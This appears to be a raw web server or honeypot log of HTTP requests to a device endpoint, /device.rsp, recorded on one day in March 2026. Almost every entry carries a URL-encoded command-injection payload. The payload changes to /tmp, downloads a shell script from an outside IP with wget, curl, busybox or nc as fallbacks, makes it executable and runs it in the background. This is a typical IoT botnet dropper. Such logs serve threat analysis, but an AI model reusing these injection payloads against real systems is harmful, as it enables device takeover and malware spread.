[2026-03-20 18:28:22] === HTTP Request ===
[2026-03-20 17:53:12] Main page accessed - IP: 176.65.149.45:33826
===================
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:33826
Path: /
URL: /
Method: GET
[2026-03-20 17:53:12] === HTTP Request ===
===================
Body: opt=sys&cmd=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 135
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:59016
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:38:51] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:44106
Query: opt=sys&cmd=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-03-20 17:38:36] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:49000
Query: opt=sys&cmd=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-03-20 17:38:28] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cookie: uid=1
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:42902
Query: opt=sys&cmd=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Method: GET
[2026-03-20 17:38:14] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:42922
Query: opt=sys&cmd=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Method: POST
[2026-03-20 17:38:03] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1%3Bcd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:36032
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:37:45] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:39606
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1%3Bcd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1%3Bcd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Method: GET
[2026-03-20 17:37:31] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Cookie: uid=1
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:34100
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1%3Bcd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1%3Bcd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26&mdc=
Method: POST
[2026-03-20 17:37:20] === HTTP Request ===
===================
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:43676
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1%3Bcd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29&mdc=
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1%3Bcd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29&mdc=
Method: GET
[2026-03-20 17:37:05] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:56522
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1%3Bcd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29&mdc=
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=1%3Bcd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29&mdc=
Method: POST
[2026-03-20 17:36:52] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 669
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:33300
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:36:41] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Content-Length: 669
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:46766
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:36:27] === HTTP Request ===
===================
Body: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Content-Length: 669
Content-Type: application/x-www-form-urlencoded
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:55284
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:36:13] === HTTP Request ===
===================
Body: opt=sys&cmd=__&cmd=___S_O_S_T_R_E_A_MAX___&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp%3Brm+-f+k%3Bwget+-O+k+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+k%3Bsh+k+tbk+%26
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:43002
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:36:02] === HTTP Request ===
===================
Body: opt=sys&cmd=__&cmd=___S_O_S_T_R_E_A_MAX___&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 192
Content-Type: application/x-www-form-urlencoded
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:33050
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:35:51] === HTTP Request ===
===================
Body: opt=sys&cmd=__&cmd=___S_O_S_T_R_E_A_MAX___&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 690
Content-Type: application/x-www-form-urlencoded
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:39420
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:35:33] === HTTP Request ===
===================
Body: opt=sys&cmd=__&cmd=___S_O_S_T_R_E_A_MAX___&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Content-Length: 690
Content-Type: application/x-www-form-urlencoded
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:40746
Path: /device.rsp
URL: /device.rsp
Method: POST
[2026-03-20 17:35:24] === HTTP Request ===
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:41640
Query: opt=sys&cmd=__&cmd=__\_S\_O\_S\_T\_R\_E\_A\_MAX\_\_\_&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=__&cmd=__\_S\_O\_S\_T\_R\_E\_A\_MAX\_\_\_&mdb=so&mdb=sos&mdc=cd&mdc=cd+%2Ftmp+2%3E%2Fdev%2Fnull%7C%7Ccd+%2Fvar%2Ftmp%7C%7Ccd+%2Ftmp%3Brm+-f+kla.sh%3B%28wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cwget+-qO+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Ccurl+-sLo+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh+2%3E%2Fdev%2Fnull%7C%7Cnc+45.148.120.23+3342+%3Ekla.sh+2%3E%2Fdev%2Fnull%29%3B%5B+-s+kla.sh+%5D%26%26%28chmod+777+kla.sh+2%3E%2Fdev%2Fnull%7C%7Cchmod+%2Bx+kla.sh%29%26%26%28nohup+sh+kla.sh+tbk+%3E%2Fdev%2Fnull+2%3E%261+%26%29
Method: GET
[2026-03-20 17:35:11] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.8:53318
